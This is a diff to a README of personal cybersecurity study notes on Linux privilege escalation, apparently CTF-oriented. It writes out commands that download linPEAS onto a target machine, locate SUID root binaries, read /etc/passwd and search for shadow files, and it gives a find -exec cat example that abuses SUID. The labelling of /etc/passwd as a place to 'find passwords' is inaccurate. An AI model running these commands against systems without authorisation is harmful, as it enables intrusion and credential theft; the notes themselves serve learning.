Berkanktk/CyberSecurity/README.md

 Or use [GTFOBins](https://gtfobins.github.io)

 You can also run:
-wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh on a target machine to see the files that stand out.
+`wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh` on a target machine to see the files that stand out.

-Another option would be to run the following command:
+Another option would be to run the following command to find all files with the SUID bit set:
-`find / -user root -perm 4000 -print 2>/dev/null`
+`find / -user root -perm 4000 -print 2>/dev/null` good
+`find / -user root -perm 4000 -exec ls -ldb {} \; 2>/dev/null` better
+`find / -user root -perm 4000 -exec ls -ldb {} \; 2>/dev/null | grep 'bin'` best

 `2>/dev/null` will filter out the errors so that they will not be output to your console

+### Find info about the users of the system
+Find users on a system
+`cat /etc/passwd | grep “/bin/bash”`

+Find passwords
+`cat /etc/passwd`

+If you don't have privilege, try this
+`find / -name shadow* 2>/dev/null | head`

+### Privilege Escalation using SUID Binaries
+`-rwsr-xr-x`
+“s” = SUID.
+This means that any user can execute these commands and they will be ran as the original owner.

+**Example**
+Lets say the `cat` command had the 's' in its SUID.
+Then you would be able to use something like the following command:
+`find /home/berkan/flag1.txt -exec cat {} \;`

 ## Phishing